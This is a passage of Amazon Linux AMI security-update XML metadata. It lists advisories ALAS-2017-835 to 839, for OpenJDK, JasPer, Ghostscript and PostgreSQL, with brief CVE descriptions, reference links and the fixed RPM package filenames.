release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.4.4" release="13.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-winbind-clients-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-test" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.4.4" release="13.35.amzn1" epoch="0" 
arch="i686"><filename>Packages/libwbclient-devel-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.4.4-13.35.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.4.4" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.4.4-13.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-835</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-835: medium priority package update for java-1.7.0-openjdk</title><issued date="2017-06-06 16:33:00" /><updated date="2017-06-06 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-3544:
* Newline injection flaws were discovered in FTP and SMTP client implementations in the Networking component in OpenJDK. A remote attacker could possibly use these flaws to manipulate FTP or SMTP connections established by a Java application.
CVE-2017-3539:
* It was discovered that the Security component of OpenJDK did not allow users to restrict the set of algorithms allowed for Jar integrity verification. This flaw could allow an attacker to modify the content of a Jar file that used a weak signing key or hash algorithm.
CVE-2017-3533:
* Newline injection flaws were discovered in FTP and SMTP client implementations in the Networking component in OpenJDK. A remote attacker could possibly use these flaws to manipulate FTP or SMTP connections established by a Java application.
CVE-2017-3526:
* It was found that the JAXP component of OpenJDK failed to correctly enforce parse tree size limits when parsing an XML document. An attacker able to make a Java application parse a specially crafted XML document could use this flaw to make it consume an excessive amount of CPU and memory.
CVE-2017-3511:
* An untrusted library search path flaw was found in the JCE component of OpenJDK. A local attacker could possibly use this flaw to cause a Java application using JCE to load an attacker-controlled library and hence escalate their privileges.
CVE-2017-3509:
* It was discovered that the HTTP client implementation in the Networking component of OpenJDK could cache and re-use an NTLM authenticated connection in a different security context. A remote attacker could possibly use this flaw to make a Java application perform HTTP requests authenticated with credentials of a different user.
CVE-2016-5542:
Note: This update extends the fix for CVE-2016-5542 released as part of the RHSA-2016:2658 erratum to no longer allow the MD5 hash algorithm during Jar integrity verification by adding it to the jdk.jar.disabledAlgorithms security property.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3509" title="" id="CVE-2017-3509" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3511" title="" id="CVE-2017-3511" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3526" title="" id="CVE-2017-3526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3533" title="" id="CVE-2017-3533" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3539" title="" id="CVE-2017-3539" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3544" title="" id="CVE-2017-3544" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1204.html" title="" id="RHSA-2017:1204" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-devel" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.141-2.6.10.1.73.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.141" 
release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.141-2.6.10.1.73.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.141" release="2.6.10.1.73.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.141-2.6.10.1.73.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-836</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-836: important priority package update for jasper</title><issued date="2017-06-06 16:49:00" /><updated date="2017-07-25 18:15:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9600:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9591:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-9583:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9560:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-9394:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9393:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9392:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9391:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9390:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9389:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9388:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9387:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-9262:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8885:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8884:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8883:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-8693:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8692:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-8691:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-8690:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-8654:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-2116:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-2089:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-1867:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-1577:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2016-10251:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash.
CVE-2016-1024:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2015-5221:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
CVE-2015-5203:
Multiple flaws were found in the way JasPer decoded JPEG 2000 image files. A specially crafted file could cause an application using JasPer to crash or, possibly, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5203" title="" id="CVE-2015-5203" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5221" title="" id="CVE-2015-5221" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1024" title="" id="CVE-2016-1024" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10251" title="" id="CVE-2016-10251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1577" title="" id="CVE-2016-1577" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1867" title="" id="CVE-2016-1867" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2089" title="" id="CVE-2016-2089" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2116" title="" id="CVE-2016-2116" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8654" title="" id="CVE-2016-8654" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8690" title="" id="CVE-2016-8690" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8691" title="" id="CVE-2016-8691" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8692" title="" id="CVE-2016-8692" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8693" title="" id="CVE-2016-8693" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8883" title="" id="CVE-2016-8883" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8884" title="" id="CVE-2016-8884" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8885" title="" id="CVE-2016-8885" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9262" title="" id="CVE-2016-9262" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9387" title="" id="CVE-2016-9387" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9388" title="" id="CVE-2016-9388" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9389" title="" id="CVE-2016-9389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9390" title="" id="CVE-2016-9390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9391" title="" id="CVE-2016-9391" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9392" title="" id="CVE-2016-9392" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9393" title="" id="CVE-2016-9393" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9394" title="" id="CVE-2016-9394" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9560" title="" id="CVE-2016-9560" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9583" title="" id="CVE-2016-9583" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9591" title="" id="CVE-2016-9591" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9600" title="" id="CVE-2016-9600" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1208.html" title="" id="RHSA-2017:1208" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jasper-debuginfo" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-debuginfo-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.9.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/jasper-libs-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-devel-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="21.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/jasper-utils-1.900.1-21.9.amzn1.x86_64.rpm</filename></package><package name="jasper-devel" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-devel-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper-utils" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-utils-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper-libs" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-libs-1.900.1-21.9.amzn1.i686.rpm</filename></package><package name="jasper-debuginfo" version="1.900.1" release="21.9.amzn1" epoch="0" arch="i686"><filename>Packages/jasper-debuginfo-1.900.1-21.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-837</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-837: important priority package update for ghostscript</title><issued date="2017-06-06 16:51:00" /><updated date="2017-06-06 22:44:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8291:
* It was found that ghostscript did not properly validate the parameters passed to the .rsdparams and .eqproc functions. During its execution, a specially crafted PostScript document could execute code in the context of the ghostscript process, bypassing the -dSAFER protection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8291" title="" id="CVE-2017-8291" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2017:1230.html" title="" id="RHSA-2017:1230" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ghostscript-doc" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-doc-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-devel-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-debuginfo-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="23.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ghostscript-8.70-23.25.amzn1.x86_64.rpm</filename></package><package name="ghostscript" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-8.70-23.25.amzn1.i686.rpm</filename></package><package name="ghostscript-debuginfo" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-debuginfo-8.70-23.25.amzn1.i686.rpm</filename></package><package name="ghostscript-doc" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-doc-8.70-23.25.amzn1.i686.rpm</filename></package><package name="ghostscript-devel" version="8.70" release="23.25.amzn1" epoch="0" arch="i686"><filename>Packages/ghostscript-devel-8.70-23.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-838</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-838: medium priority 
package update for postgresql92</title><issued date="2017-06-06 16:53:00" /><updated date="2017-06-06 22:45:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7486:
It was found that the pg_user_mappings view from postgresql could disclose information about user mappings to a foreign database to unprivileged users. An authenticated attacker with USAGE privilege for this mapping could, when querying the view, obtain user mapping data, such as the username and password used to connect to the foreign database.
1448089:
CVE-2017-7486 postgresql: pg_user_mappings view discloses foreign server passwords
CVE-2017-7484:
It was found that some selectivity estimation functions did not check user privileges before providing information from pg_statistic, possibly leaking information. An unprivileged attacker could use this flaw to steal some information from tables they are otherwise not allowed to access.
1448078:
CVE-2017-7484 postgresql: Selectivity estimators bypass SELECT privilege checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7484" title="" id="CVE-2017-7484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7486" title="" id="CVE-2017-7486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-plperl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-test" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.21" release="1.60.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.21-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.21" 
release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.21-1.60.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.21" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.21-1.60.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2017-839</id><title>Amazon Linux AMI 2014.03 - ALAS-2017-839: medium priority package update for postgresql93 postgresql94 postgresql95</title><issued date="2017-06-06 16:53:00" /><updated date="2017-06-06 22:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-7486:
It was found that the pg_user_mappings view from postgresql could disclose information about user mappings to a foreign database to unprivileged users. An authenticated attacker with USAGE privilege for this mapping could, when querying the view, obtain user mapping data, such as the username and password used to connect to the foreign database.
1448089:
CVE-2017-7486 postgresql: pg_user_mappings view discloses foreign server passwords
CVE-2017-7485:
It was found that the PGREQUIRESSL environment variable was no longer enforcing an SSL/TLS connection to a PostgreSQL server. An active Man-in-the-Middle attacker could use this flaw to strip the SSL/TLS protection from a connection between a client and a server.
1448086:
CVE-2017-7485 postgresql: libpq ignores PGREQUIRESSL environment variable
CVE-2017-7484:
It was found that some selectivity estimation functions did not check user privileges before providing information from pg_statistic, possibly leaking information. An unprivileged attacker could use this flaw to steal some information from tables they are otherwise not allowed to access.
1448078:
CVE-2017-7484 postgresql: Selectivity estimators bypass SELECT privilege checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7484" title="" id="CVE-2017-7484" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7485" title="" id="CVE-2017-7485" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7486" title="" id="CVE-2017-7486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql93-libs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.17" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.17-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.17" release="1.63.amzn1" epoch="0" 